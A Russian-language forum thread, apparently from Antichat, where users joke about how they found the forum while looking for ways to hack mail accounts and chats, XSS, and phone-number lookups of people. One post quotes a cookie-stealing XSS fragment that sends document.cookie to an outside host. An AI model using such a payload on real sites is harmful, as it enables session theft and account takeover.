Раньше мои волосы были сухие и ломкие но как только я нашол етот форум и зарегился мои проблемы с волосами закончились мне просто их все повыдерали за взлом сервака в школе халявной игры в комютерных клубах --) ------------------------------ Шютка!
во во именно так и было - "Искал где мона почитать, как взломать мыльники и чаты. С ссылки на сайте прошел на форум."
1 вариант ))) Так вот и натнулся на ачат ))) Искал инфу по взлому чего-то ))) И ещё тут есть "вина" чатов на мыл.ру ))) Пробить данные о человеке зная номер телефона
Я вообще попала сюда довольно забавно,на одном из форумов которые админила нашла в чьем-то постиге чтото вроде "....бла-бла-бла http://antichat.ru/cgi-bin/s.jpg?+document.cookie....." вот решила полубопытствовать кто стащить печенюшки хотел зашла по ссылке ,ну и осталась тут))
Я раньше только на видео.античат.ру сидел и не подозревал, что на форуме так интересно и прикольно ((( целых пол года не знал, что на форуме туса прикольая ))) Сцуко ((( А как узнал мне тут не понравилось первое время, а потом привык и щас форум античата для меня, как дом родной )))
бл* я тут с начала года.... причем тут регистрация ??? обязательно ли регистрироваться когда просматриваешь форум или качаешь видео ????????????????????
Я про Xss искал...И уязвимости в форумах и чатах... Сначала на античат а потом уш и на форум припёрся.
Что-то искал, ничего конкретного. Вообщем набрёл =) вобщемто да =))) еще давным давно нашел сайт а на форуме стал токо щас сидеть =)))
Кхм. Надо было одну Xss посмотреть. зашел на ачат, т.к. это одн из лучших реурсов на эту тему. Увидел другие, заинтересовался. Подписался на Rss форума, читал, ужасался "умным" вопросам. Но как я и ожидал, под этой всей шелухой спратанные лежат очень, очень интересные вещи! Надо только уметь присмотреться ;-) Я рад что я тут